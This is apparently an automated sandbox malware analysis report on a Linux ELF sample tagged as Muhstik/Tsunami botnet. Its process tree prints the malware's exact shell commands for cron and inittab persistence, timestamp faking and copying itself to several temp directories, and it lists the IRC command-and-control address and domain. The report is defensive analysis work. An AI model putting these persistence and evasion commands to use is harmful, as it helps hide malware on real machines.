Loading ...

Play interactive tourEdit tour

Linux Analysis Report pty3

Overview

General Information

Sample Name:pty3
Analysis ID:543493
MD5:12cedf7cd63208ee8fd9d0359637c46c
SHA1:6c376c3a9d7811100e0c470fc3d4d05de06fb30b
SHA256:4a719439027a279b14a05d650691bed6e0a437ae87fb55895406616a55c6c720
Tags:elflog4j
Infos:

Detection

Muhstik Tsunami
Score:96
Range:0 - 100
Whitelisted:false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Muhstik
Multi AV Scanner detection for submitted file
Yara detected Tsunami
Uses IRC for communication with a C&C
Writes identical ELF files to multiple locations
Sample tries to persist itself using cron
Explicitly modifies time stamps using the "touch" command
Executes the "crontab" command typically for achieving persistence
Uses known network protocols on non-standard ports
Sample contains only a LOAD segment without any section mappings
Writes ELF files to disk
Executes the "grep" command used to find patterns in files or piped streams
Uses the "uname" system call to query kernel version information (possible evasion)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Writes crontab like entries to files to /var or /etc typically for achieving persistence
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Executes commands using a shell command-line interpreter
Executes the "rm" command used to delete files or directories
Executes the "touch" command used to create files or modify time stamps

Classification

Analysis Advice

All HTTP servers contacted by the sample do not answer. Likely the sample is an old dropper which does no longer work
All domains contacted by the sample do not resolve. Likely the sample is an old dropper which does no longer work

General Information

Joe Sandbox Version:34.0.0 Boulder Opal
Analysis ID:543493
Start date:21.12.2021
Start time:15:41:22
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 6m 29s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:pty3
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal96.troj.evad.lin@0/23@8/0
Warnings:
Show All
  • VT rate limit hit for: /dev/shm/pty3

Process Tree

  • system is lnxubuntu20
  • pty3 (PID: 5228, Parent: 5118, MD5: 12cedf7cd63208ee8fd9d0359637c46c) Arguments: /tmp/pty3
    • pty3 New Fork (PID: 5229, Parent: 5228)
    • sh (PID: 5229, Parent: 5228, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof -x strace > /dev/null"
      • sh New Fork (PID: 5230, Parent: 5229)
      • pidof (PID: 5230, Parent: 5229, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof -x strace
    • pty3 New Fork (PID: 5232, Parent: 5228)
    • sh (PID: 5232, Parent: 5228, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof -x tcpdump > /dev/null"
      • sh New Fork (PID: 5233, Parent: 5232)
      • pidof (PID: 5233, Parent: 5232, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof -x tcpdump
    • pty3 New Fork (PID: 5236, Parent: 5228)
      • pty3 New Fork (PID: 5239, Parent: 5236)
      • sh (PID: 5239, Parent: 5236, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab -r"
        • sh New Fork (PID: 5245, Parent: 5239)
        • crontab (PID: 5245, Parent: 5239, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -r
    • pty3 New Fork (PID: 5237, Parent: 5228)
      • pty3 New Fork (PID: 5240, Parent: 5237)
      • sh (PID: 5240, Parent: 5237, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab -l | grep /tmp/pty3 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /tmp/pty3 > /dev/null 2>&1 &\") | crontab -"
        • sh New Fork (PID: 5242, Parent: 5240)
        • crontab (PID: 5242, Parent: 5240, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
        • sh New Fork (PID: 5244, Parent: 5240)
        • grep (PID: 5244, Parent: 5240, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep /tmp/pty3
        • sh New Fork (PID: 5246, Parent: 5240)
        • grep (PID: 5246, Parent: 5240, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v "no cron"
        • sh New Fork (PID: 5250, Parent: 5240)
          • sh New Fork (PID: 5252, Parent: 5250)
          • crontab (PID: 5252, Parent: 5250, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
        • sh New Fork (PID: 5251, Parent: 5240)
        • crontab (PID: 5251, Parent: 5240, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
    • pty3 New Fork (PID: 5238, Parent: 5228)
    • sh (PID: 5238, Parent: 5228, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab | grep -v \"/tmp/pty3\" > /etc/inittab2"
      • sh New Fork (PID: 5241, Parent: 5238)
      • cat (PID: 5241, Parent: 5238, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab
      • sh New Fork (PID: 5243, Parent: 5238)
      • grep (PID: 5243, Parent: 5238, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v /tmp/pty3
    • pty3 New Fork (PID: 5249, Parent: 5228)
    • sh (PID: 5249, Parent: 5228, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"0:2345:respawn:/tmp/pty3\" >> /etc/inittab2"
    • pty3 New Fork (PID: 5253, Parent: 5228)
    • sh (PID: 5253, Parent: 5228, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab2 > /etc/inittab"
      • sh New Fork (PID: 5254, Parent: 5253)
      • cat (PID: 5254, Parent: 5253, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab2
    • pty3 New Fork (PID: 5255, Parent: 5228)
    • sh (PID: 5255, Parent: 5228, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /etc/inittab2"
      • sh New Fork (PID: 5256, Parent: 5255)
      • rm (PID: 5256, Parent: 5255, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /etc/inittab2
    • pty3 New Fork (PID: 5257, Parent: 5228)
    • sh (PID: 5257, Parent: 5228, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "touch -acmr /bin/ls /etc/inittab"
      • sh New Fork (PID: 5258, Parent: 5257)
      • touch (PID: 5258, Parent: 5257, MD5: 3859c173f5d3b37be3e531b7c84a9c68) Arguments: touch -acmr /bin/ls /etc/inittab
    • pty3 New Fork (PID: 5259, Parent: 5228)
      • pty3 New Fork (PID: 5261, Parent: 5259)
      • sh (PID: 5261, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cp -f /tmp/pty3 /dev/shm/pty3"
        • sh New Fork (PID: 5263, Parent: 5261)
        • cp (PID: 5263, Parent: 5261, MD5: 40f10ae7ea3e44218d1a8c306f79c83f) Arguments: cp -f /tmp/pty3 /dev/shm/pty3
      • pty3 New Fork (PID: 5265, Parent: 5259)
        • pty3 New Fork (PID: 5267, Parent: 5265)
        • sh (PID: 5267, Parent: 5265, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab -l | grep /dev/shm/pty3 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /dev/shm/pty3 > /dev/null 2>&1 &\") | crontab -"
          • sh New Fork (PID: 5268, Parent: 5267)
          • crontab (PID: 5268, Parent: 5267, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
          • sh New Fork (PID: 5269, Parent: 5267)
          • grep (PID: 5269, Parent: 5267, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep /dev/shm/pty3
          • sh New Fork (PID: 5270, Parent: 5267)
          • grep (PID: 5270, Parent: 5267, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v "no cron"
          • sh New Fork (PID: 5273, Parent: 5267)
            • sh New Fork (PID: 5275, Parent: 5273)
            • crontab (PID: 5275, Parent: 5273, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
          • sh New Fork (PID: 5274, Parent: 5267)
          • crontab (PID: 5274, Parent: 5267, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
      • pty3 New Fork (PID: 5266, Parent: 5259)
      • sh (PID: 5266, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab | grep -v \"/dev/shm/pty3\" > /etc/inittab2"
        • sh New Fork (PID: 5271, Parent: 5266)
        • cat (PID: 5271, Parent: 5266, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab
        • sh New Fork (PID: 5272, Parent: 5266)
        • grep (PID: 5272, Parent: 5266, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v /dev/shm/pty3
      • pty3 New Fork (PID: 5276, Parent: 5259)
      • sh (PID: 5276, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"0:2345:respawn:/dev/shm/pty3\" >> /etc/inittab2"
      • pty3 New Fork (PID: 5277, Parent: 5259)
      • sh (PID: 5277, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab2 > /etc/inittab"
        • sh New Fork (PID: 5278, Parent: 5277)
        • cat (PID: 5278, Parent: 5277, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab2
      • pty3 New Fork (PID: 5279, Parent: 5259)
      • sh (PID: 5279, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /etc/inittab2"
        • sh New Fork (PID: 5280, Parent: 5279)
        • rm (PID: 5280, Parent: 5279, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /etc/inittab2
      • pty3 New Fork (PID: 5281, Parent: 5259)
      • sh (PID: 5281, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "touch -acmr /bin/ls /etc/inittab"
        • sh New Fork (PID: 5282, Parent: 5281)
        • touch (PID: 5282, Parent: 5281, MD5: 3859c173f5d3b37be3e531b7c84a9c68) Arguments: touch -acmr /bin/ls /etc/inittab
      • pty3 New Fork (PID: 5283, Parent: 5259)
      • sh (PID: 5283, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cp -f /tmp/pty3 /var/tmp/pty3"
        • sh New Fork (PID: 5284, Parent: 5283)
        • cp (PID: 5284, Parent: 5283, MD5: 40f10ae7ea3e44218d1a8c306f79c83f) Arguments: cp -f /tmp/pty3 /var/tmp/pty3
      • pty3 New Fork (PID: 5285, Parent: 5259)
        • pty3 New Fork (PID: 5287, Parent: 5285)
        • sh (PID: 5287, Parent: 5285, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab -l | grep /var/tmp/pty3 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/tmp/pty3 > /dev/null 2>&1 &\") | crontab -"
          • sh New Fork (PID: 5290, Parent: 5287)
          • crontab (PID: 5290, Parent: 5287, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
          • sh New Fork (PID: 5291, Parent: 5287)
          • grep (PID: 5291, Parent: 5287, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep /var/tmp/pty3
          • sh New Fork (PID: 5292, Parent: 5287)
          • grep (PID: 5292, Parent: 5287, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v "no cron"
          • sh New Fork (PID: 5294, Parent: 5287)
            • sh New Fork (PID: 5296, Parent: 5294)
            • crontab (PID: 5296, Parent: 5294, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
          • sh New Fork (PID: 5295, Parent: 5287)
          • crontab (PID: 5295, Parent: 5287, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
      • pty3 New Fork (PID: 5286, Parent: 5259)
      • sh (PID: 5286, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab | grep -v \"/var/tmp/pty3\" > /etc/inittab2"
        • sh New Fork (PID: 5288, Parent: 5286)
        • cat (PID: 5288, Parent: 5286, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab
        • sh New Fork (PID: 5289, Parent: 5286)
        • grep (PID: 5289, Parent: 5286, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v /var/tmp/pty3
      • pty3 New Fork (PID: 5293, Parent: 5259)
      • sh (PID: 5293, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"0:2345:respawn:/var/tmp/pty3\" >> /etc/inittab2"
      • pty3 New Fork (PID: 5297, Parent: 5259)
      • sh (PID: 5297, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab2 > /etc/inittab"
        • sh New Fork (PID: 5298, Parent: 5297)
        • cat (PID: 5298, Parent: 5297, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab2
      • pty3 New Fork (PID: 5299, Parent: 5259)
      • sh (PID: 5299, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /etc/inittab2"
        • sh New Fork (PID: 5300, Parent: 5299)
        • rm (PID: 5300, Parent: 5299, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /etc/inittab2
      • pty3 New Fork (PID: 5301, Parent: 5259)
      • sh (PID: 5301, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "touch -acmr /bin/ls /etc/inittab"
        • sh New Fork (PID: 5302, Parent: 5301)
        • touch (PID: 5302, Parent: 5301, MD5: 3859c173f5d3b37be3e531b7c84a9c68) Arguments: touch -acmr /bin/ls /etc/inittab
      • pty3 New Fork (PID: 5303, Parent: 5259)
      • sh (PID: 5303, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cp -f /tmp/pty3 /var/lock/pty3"
        • sh New Fork (PID: 5304, Parent: 5303)
        • cp (PID: 5304, Parent: 5303, MD5: 40f10ae7ea3e44218d1a8c306f79c83f) Arguments: cp -f /tmp/pty3 /var/lock/pty3
      • pty3 New Fork (PID: 5305, Parent: 5259)
        • pty3 New Fork (PID: 5307, Parent: 5305)
        • sh (PID: 5307, Parent: 5305, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab -l | grep /var/lock/pty3 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/lock/pty3 > /dev/null 2>&1 &\") | crontab -"
          • sh New Fork (PID: 5310, Parent: 5307)
          • crontab (PID: 5310, Parent: 5307, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
          • sh New Fork (PID: 5311, Parent: 5307)
          • grep (PID: 5311, Parent: 5307, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep /var/lock/pty3
          • sh New Fork (PID: 5312, Parent: 5307)
          • grep (PID: 5312, Parent: 5307, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v "no cron"
          • sh New Fork (PID: 5316, Parent: 5307)
            • sh New Fork (PID: 5318, Parent: 5316)
            • crontab (PID: 5318, Parent: 5316, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
          • sh New Fork (PID: 5317, Parent: 5307)
          • crontab (PID: 5317, Parent: 5307, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
      • pty3 New Fork (PID: 5306, Parent: 5259)
      • sh (PID: 5306, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab | grep -v \"/var/lock/pty3\" > /etc/inittab2"
        • sh New Fork (PID: 5308, Parent: 5306)
        • cat (PID: 5308, Parent: 5306, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab
        • sh New Fork (PID: 5309, Parent: 5306)
        • grep (PID: 5309, Parent: 5306, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v /var/lock/pty3
      • pty3 New Fork (PID: 5315, Parent: 5259)
      • sh (PID: 5315, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"0:2345:respawn:/var/lock/pty3\" >> /etc/inittab2"
      • pty3 New Fork (PID: 5319, Parent: 5259)
      • sh (PID: 5319, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab2 > /etc/inittab"
        • sh New Fork (PID: 5320, Parent: 5319)
        • cat (PID: 5320, Parent: 5319, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab2
      • pty3 New Fork (PID: 5321, Parent: 5259)
      • sh (PID: 5321, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /etc/inittab2"
        • sh New Fork (PID: 5322, Parent: 5321)
        • rm (PID: 5322, Parent: 5321, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /etc/inittab2
      • pty3 New Fork (PID: 5323, Parent: 5259)
      • sh (PID: 5323, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "touch -acmr /bin/ls /etc/inittab"
        • sh New Fork (PID: 5324, Parent: 5323)
        • touch (PID: 5324, Parent: 5323, MD5: 3859c173f5d3b37be3e531b7c84a9c68) Arguments: touch -acmr /bin/ls /etc/inittab
      • pty3 New Fork (PID: 5325, Parent: 5259)
      • sh (PID: 5325, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cp -f /tmp/pty3 /var/run/pty3"
        • sh New Fork (PID: 5326, Parent: 5325)
        • cp (PID: 5326, Parent: 5325, MD5: 40f10ae7ea3e44218d1a8c306f79c83f) Arguments: cp -f /tmp/pty3 /var/run/pty3
      • pty3 New Fork (PID: 5327, Parent: 5259)
        • pty3 New Fork (PID: 5329, Parent: 5327)
        • sh (PID: 5329, Parent: 5327, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab -l | grep /var/run/pty3 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/run/pty3 > /dev/null 2>&1 &\") | crontab -"
          • sh New Fork (PID: 5332, Parent: 5329)
          • crontab (PID: 5332, Parent: 5329, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
          • sh New Fork (PID: 5333, Parent: 5329)
          • grep (PID: 5333, Parent: 5329, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep /var/run/pty3
          • sh New Fork (PID: 5334, Parent: 5329)
          • grep (PID: 5334, Parent: 5329, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v "no cron"
          • sh New Fork (PID: 5336, Parent: 5329)
            • sh New Fork (PID: 5338, Parent: 5336)
            • crontab (PID: 5338, Parent: 5336, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
          • sh New Fork (PID: 5337, Parent: 5329)
          • crontab (PID: 5337, Parent: 5329, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
      • pty3 New Fork (PID: 5328, Parent: 5259)
      • sh (PID: 5328, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab | grep -v \"/var/run/pty3\" > /etc/inittab2"
        • sh New Fork (PID: 5330, Parent: 5328)
        • cat (PID: 5330, Parent: 5328, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab
        • sh New Fork (PID: 5331, Parent: 5328)
        • grep (PID: 5331, Parent: 5328, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v /var/run/pty3
      • pty3 New Fork (PID: 5335, Parent: 5259)
      • sh (PID: 5335, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"0:2345:respawn:/var/run/pty3\" >> /etc/inittab2"
      • pty3 New Fork (PID: 5339, Parent: 5259)
      • sh (PID: 5339, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab2 > /etc/inittab"
        • sh New Fork (PID: 5340, Parent: 5339)
        • cat (PID: 5340, Parent: 5339, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab2
      • pty3 New Fork (PID: 5341, Parent: 5259)
      • sh (PID: 5341, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /etc/inittab2"
        • sh New Fork (PID: 5342, Parent: 5341)
        • rm (PID: 5342, Parent: 5341, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /etc/inittab2
      • pty3 New Fork (PID: 5343, Parent: 5259)
      • sh (PID: 5343, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "touch -acmr /bin/ls /etc/inittab"
        • sh New Fork (PID: 5344, Parent: 5343)
        • touch (PID: 5344, Parent: 5343, MD5: 3859c173f5d3b37be3e531b7c84a9c68) Arguments: touch -acmr /bin/ls /etc/inittab
    • pty3 New Fork (PID: 5260, Parent: 5228)
      • pty3 New Fork (PID: 5262, Parent: 5260)
      • sh (PID: 5262, Parent: 5260, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/bin/uname -n"
        • sh New Fork (PID: 5264, Parent: 5262)
        • uname (PID: 5264, Parent: 5262, MD5: 4ac7c634c5bec95753c480e9d421dcc2) Arguments: /bin/uname -n
  • cleanup

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
5305.1.00000000a0bbd638.00000000f9d79001.r-x.sdmpJoeSecurity_TsunamiYara detected TsunamiJoe Security
    5305.1.00000000a0bbd638.00000000f9d79001.r-x.sdmpJoeSecurity_MuhstikYara detected MuhstikJoe Security
      5285.1.00000000a0bbd638.00000000f9d79001.r-x.sdmpJoeSecurity_TsunamiYara detected TsunamiJoe Security
        5285.1.00000000a0bbd638.00000000f9d79001.r-x.sdmpJoeSecurity_MuhstikYara detected MuhstikJoe Security
          5237.1.00000000a0bbd638.00000000f9d79001.r-x.sdmpJoeSecurity_TsunamiYara detected TsunamiJoe Security
            Click to see the 19 entries

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Multi AV Scanner detection for submitted fileShow sources
            Source: pty3Virustotal: Detection: 51%Perma Link
            Source: pty3Metadefender: Detection: 32%Perma Link
            Source: pty3ReversingLabs: Detection: 51%

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2034743 ET TROJAN ELF/Muhstik Botnet CnC Activity 192.168.2.23:35994 -> 144.172.71.180:8080
            Uses IRC for communication with a C&CShow sources
            Source: unknownIRC traffic detected: 192.168.2.23:35994 -> 144.172.71.180:8080 NICK x86|LOG|i|0|6234378|galassia USER x01 localhost localhost :muhstik-11052018
            Uses known network protocols on non-standard portsShow sources
            Source: unknownNetwork traffic detected: IRC traffic on port 35994 -> 8080
            Source: unknownNetwork traffic detected: IRC traffic on port 35994 -> 8080
            Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
            Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
            Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
            Source: global trafficTCP traffic: 192.168.2.23:35994 -> 144.172.71.180:8080
            Source: /tmp/pty3 (PID: 5228)Socket: 127.0.0.1::59000Jump to behavior
            Source: unknownDNS traffic detected: query: l.deutschland-zahlung.net replaycode: Name error (3)
            Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
            Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
            Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
            Source: unknownTCP traffic detected without corresponding DNS query: 144.172.71.180
            Source: unknownTCP traffic detected without corresponding DNS query: 144.172.71.180
            Source: unknownTCP traffic detected without corresponding DNS query: 144.172.71.180
            Source: unknownTCP traffic detected without corresponding DNS query: 144.172.71.180
            Source: unknownTCP traffic detected without corresponding DNS query: 144.172.71.180
            Source: unknownTCP traffic detected without corresponding DNS query: 144.172.71.180
            Source: unknownTCP traffic detected without corresponding DNS query: 144.172.71.180
            Source: unknownTCP traffic detected without corresponding DNS query: 144.172.71.180
            Source: unknownTCP traffic detected without corresponding DNS query: 144.172.71.180
            Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
            Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
            Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
            Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownDNS traffic detected: queries for: l.deutschland-zahlung.net
            Source: LOAD without section mappingsProgram segment: 0x100000
            Source: classification engineClassification label: mal96.troj.evad.lin@0/23@8/0

            Persistence and Installation Behavior:

            barindex
            Writes identical ELF files to multiple locationsShow sources
            Source: /usr/bin/cp (PID: 5304)File with SHA-256 4A719439027A279B14A05D650691BED6E0A437AE87FB55895406616A55C6C720 written: /run/lock/pty3Jump to dropped file
            Source: /usr/bin/cp (PID: 5263)File with SHA-256 4A719439027A279B14A05D650691BED6E0A437AE87FB55895406616A55C6C720 written: /dev/shm/pty3Jump to dropped file
            Source: /usr/bin/cp (PID: 5284)File with SHA-256 4A719439027A279B14A05D650691BED6E0A437AE87FB55895406616A55C6C720 written: /var/tmp/pty3Jump to dropped file
            Source: /usr/bin/cp (PID: 5326)File with SHA-256 4A719439027A279B14A05D650691BED6E0A437AE87FB55895406616A55C6C720 written: /run/pty3Jump to dropped file
            Sample tries to persist itself using cronShow sources
            Source: /usr/bin/crontab (PID: 5251)File: /var/spool/cron/crontabs/tmp.l3d2DfJump to behavior
            Source: /usr/bin/crontab (PID: 5251)File: /var/spool/cron/crontabs/rootJump to behavior
            Source: /usr/bin/crontab (PID: 5274)File: /var/spool/cron/crontabs/tmp.OnJidYJump to behavior
            Source: /usr/bin/crontab (PID: 5274)File: /var/spool/cron/crontabs/rootJump to behavior
            Source: /usr/bin/crontab (PID: 5295)File: /var/spool/cron/crontabs/tmp.u6tmyyJump to behavior
            Source: /usr/bin/crontab (PID: 5295)File: /var/spool/cron/crontabs/rootJump to behavior
            Source: /usr/bin/crontab (PID: 5317)File: /var/spool/cron/crontabs/tmp.pRPXldJump to behavior
            Source: /usr/bin/crontab (PID: 5317)File: /var/spool/cron/crontabs/rootJump to behavior
            Source: /usr/bin/crontab (PID: 5337)File: /var/spool/cron/crontabs/tmp.qQwB9IJump to behavior
            Source: /usr/bin/crontab (PID: 5337)File: /var/spool/cron/crontabs/rootJump to behavior
            Explicitly modifies time stamps using the "touch" commandShow sources
            Source: /bin/sh (PID: 5258)Touch executable uses timestamp modification options: touch -acmr /bin/ls /etc/inittabJump to behavior
            Source: /bin/sh (PID: 5282)Touch executable uses timestamp modification options: touch -acmr /bin/ls /etc/inittabJump to behavior
            Source: /bin/sh (PID: 5302)Touch executable uses timestamp modification options: touch -acmr /bin/ls /etc/inittabJump to behavior
            Source: /bin/sh (PID: 5324)Touch executable uses timestamp modification options: touch -acmr /bin/ls /etc/inittabJump to behavior
            Source: /bin/sh (PID: 5344)Touch executable uses timestamp modification options: touch -acmr /bin/ls /etc/inittabJump to behavior
            Executes the "crontab" command typically for achieving persistenceShow sources
            Source: /bin/sh (PID: 5245)Crontab executable: /usr/bin/crontab -> crontab -rJump to behavior
            Source: /bin/sh (PID: 5242)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
            Source: /bin/sh (PID: 5252)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
            Source: /bin/sh (PID: 5251)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
            Source: /bin/sh (PID: 5268)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
            Source: /bin/sh (PID: 5275)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
            Source: /bin/sh (PID: 5274)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
            Source: /bin/sh (PID: 5290)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
            Source: /bin/sh (PID: 5296)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
            Source: /bin/sh (PID: 5295)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
            Source: /bin/sh (PID: 5310)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
